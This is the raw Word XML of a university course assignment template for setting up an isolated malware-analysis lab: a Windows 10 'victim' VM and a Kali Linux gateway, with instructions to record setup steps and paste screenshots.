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00449" w:rsidP="04486216" w:rsidRDefault="00754143" w14:paraId="00000001" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VM Setup: Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="2F6B2107" w14:paraId="00000002" w14:textId="2F003A20">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose of this assignment is two-fold. First, you will build and test a simple malware analysis </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>toolbench</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> which you’ll be using throughout the semester. Second, you will begin the habit of keeping careful, repeatable notes that document your work. As your assignment submission, you will draft a report that outlines the steps taken and the findings you discovered. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000003" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000004" w14:textId="2CFFB9F7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This document outlines the major steps you will have to take, but it’s incomplete in the sense that it doesn’t provide you with step-by-step instructions. You will need to fill in the gaps yourself. There are no restrictions on resources that can be used to complete the assignment. This includes consulting with other students and the instructor. We only ask that you will not share your report with other students. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000005" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000006" w14:textId="0963EE66">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">You may use this document as a template to your report. Add your additional steps and answer the questions as you work through the studio. Your final report should be submitted to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gradescope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as a .pdf file before the due date. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00300449" w14:paraId="00000007" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000008" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Part 1: Downloading and Installing the VMs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="0ACA1E19" w14:paraId="764D2530" w14:textId="638E33AB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Please follow the instructions in a separate document to install and configure a hypervisor and our class VMs on your machine.  If you encounter problems, please don’t hesitate to ask about them, and if needed, a suitable laptop can be borrowed from Engineering IT for the semester for you to use for the coursework.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="0ACA1E19" w14:paraId="406B99F2" w14:textId="478F17BD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Take a screenshot of (each of) your VMs showing their output from the command “ping 8.8.8.8” with a successful reply, and include the screenshot here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="0ACA1E19" w14:paraId="00000022" w14:textId="3B7852B6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>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108A4A41" w14:textId="0B80565A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PASTE SCREENSHOTS HERE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="3D75E357" w14:textId="2E14FFEF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="04486216" w:rsidP="04486216" w:rsidRDefault="04486216" w14:paraId="3876FDAA" w14:textId="303D883D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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48F31EBB" w14:textId="5507DE20">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="1A0E472A" w14:paraId="00000024" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216" w:rsidR="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Part 2: Setting up an isolated virtual network</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00300449" w:rsidP="04486216" w:rsidRDefault="00754143" w14:paraId="00000025" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="04486216">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of this section is to set up an isolated network containing our two VMs as shown in the next figure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="6AEA9684" wp14:editId="07777777">
                <wp:extent cx="5619750" cy="1794301"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1" name="Group 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5619750" cy="1794301"/>
                          <a:chOff x="14050" y="385175"/>
                          <a:chExt cx="7439175" cy="2362525"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="2" name="Shape 2" descr="Grayscale desktop computer configuration vector image | Free SVG"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14">
                            <a:alphaModFix/>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="177749" y="1034825"/>
                            <a:ext cx="1087575" cy="878300"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="845040692" name="Text Box 845040692"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="14050" y="1966300"/>
                            <a:ext cx="1600200" cy="411600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="1F89AEC2" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:jc w:val="center"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Victim (Windows 10)</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="537DEE62" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:jc w:val="center"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>IP: 10.0.0.3</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="976022289" name="Straight Arrow Connector 976022289"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1265324" y="1473975"/>
                            <a:ext cx="1038300" cy="18300"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="28575" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="stealth" w="med" len="med"/>
                            <a:tailEnd type="stealth" w="med" len="med"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="5" name="Shape 5" descr="Server icon vector image | Free SVG"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15">
                            <a:alphaModFix/>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2303577" y="1033725"/>
                            <a:ext cx="630800" cy="917100"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1289433572" name="Text Box 1289433572"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1555936" y="1966300"/>
                            <a:ext cx="2126100" cy="411600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="5333FA4D" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:jc w:val="center"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Gateway and Server (Kali Linux):</w:t>
                              </w:r>
                            </w:p>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="48D3FB3D" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:jc w:val="center"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>IP: 10.0.0.1</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="7" name="Shape 7" descr="File:Folder.svg - Wikipedia"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16">
                            <a:alphaModFix/>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="3887725" y="1256778"/>
                            <a:ext cx="411600" cy="411600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="dash"/>
                            <a:round/>
                            <a:headEnd type="none" w="sm" len="sm"/>
                            <a:tailEnd type="none" w="sm" len="sm"/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="8" name="Shape 8" descr="MoonBook Laptop | Free SVG"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17">
                            <a:alphaModFix/>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="4758775" y="915025"/>
                            <a:ext cx="1136200" cy="1136201"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="9" name="Shape 9" descr="File:Applications-internet.svg - Wikimedia Commons"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18">
                            <a:alphaModFix/>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="6620600" y="1065100"/>
                            <a:ext cx="832625" cy="832625"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="1864630218" name="Straight Arrow Connector 1864630218"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="2934377" y="1462575"/>
                            <a:ext cx="953400" cy="29700"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="dash"/>
                            <a:round/>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="none" w="med" len="med"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1479431982" name="Straight Arrow Connector 1479431982"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4299325" y="1462578"/>
                            <a:ext cx="459300" cy="20400"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="dash"/>
                            <a:round/>
                            <a:headEnd type="none" w="med" len="med"/>
                            <a:tailEnd type="none" w="med" len="med"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="854516182" name="Straight Arrow Connector 854516182"/>
                        <wps:cNvCnPr/>
                        <wps:spPr>
                          <a:xfrm rot="10800000" flipH="1">
                            <a:off x="5894975" y="1481325"/>
                            <a:ext cx="725700" cy="1800"/>
                          </a:xfrm>
                          <a:prstGeom prst="straightConnector1">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="28575" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="000000"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="stealth" w="med" len="med"/>
                            <a:tailEnd type="stealth" w="med" len="med"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:bodyPr/>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1911493118" name="Text Box 1911493118"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3563875" y="882100"/>
                            <a:ext cx="1016100" cy="261600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="56701240" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Shared Folder</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1055531058" name="Text Box 1055531058"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="4986675" y="2117500"/>
                            <a:ext cx="680400" cy="261600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="4A110190" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>Host VM</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1052692416" name="Text Box 1052692416"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="6544525" y="2117500"/>
                            <a:ext cx="908700" cy="261600"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00754143" w14:paraId="4A4C27D3" w14:textId="77777777">
                              <w:pPr>
                                <w:spacing w:line="240" w:lineRule="auto"/>
                                <w:textDirection w:val="btLr"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:color w:val="000000"/>
                                  <w:sz w:val="20"/>
                                </w:rPr>
                                <w:t>The Internet</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="1982763071" name="Rectangle 1982763071"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="99825" y="390000"/>
                            <a:ext cx="3464100" cy="2357700"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="38100" cap="flat" cmpd="sng">
                            <a:solidFill>
                              <a:srgbClr val="0000FF"/>
                            </a:solidFill>
                            <a:prstDash val="solid"/>
                            <a:round/>
                            <a:headEnd type="none" w="sm" len="sm"/>
                            <a:tailEnd type="none" w="sm" len="sm"/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w:rsidR="00300449" w:rsidRDefault="00300449" w14:paraId="672A6659" w14:textId="77777777">
                              <w:pPr>
